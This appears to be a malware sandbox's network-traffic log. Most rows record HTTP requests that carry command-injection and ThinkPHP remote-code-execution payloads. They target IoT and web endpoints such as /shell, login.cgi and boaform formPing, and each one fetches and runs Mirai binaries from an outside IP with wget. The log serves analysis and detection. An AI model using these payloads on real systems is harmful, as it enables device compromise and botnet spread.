| Source: unknown | Network traffic detected: HTTP traffic on port 48518 -> 443 |
| Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 54238 |
| Source: unknown | Network traffic detected: HTTP traffic on port 53144 -> 443 |
| Source: unknown | Network traffic detected: HTTP traffic on port 39240 -> 443 |
| Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 33334 |
| Source: unknown | Network traffic detected: HTTP traffic on port 59748 -> 443 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54166 -> 443 |
| Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 45316 |
| Source: unknown | Network traffic detected: HTTP traffic on port 43378 -> 443 |
| Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 42288 |
| Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 47970 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
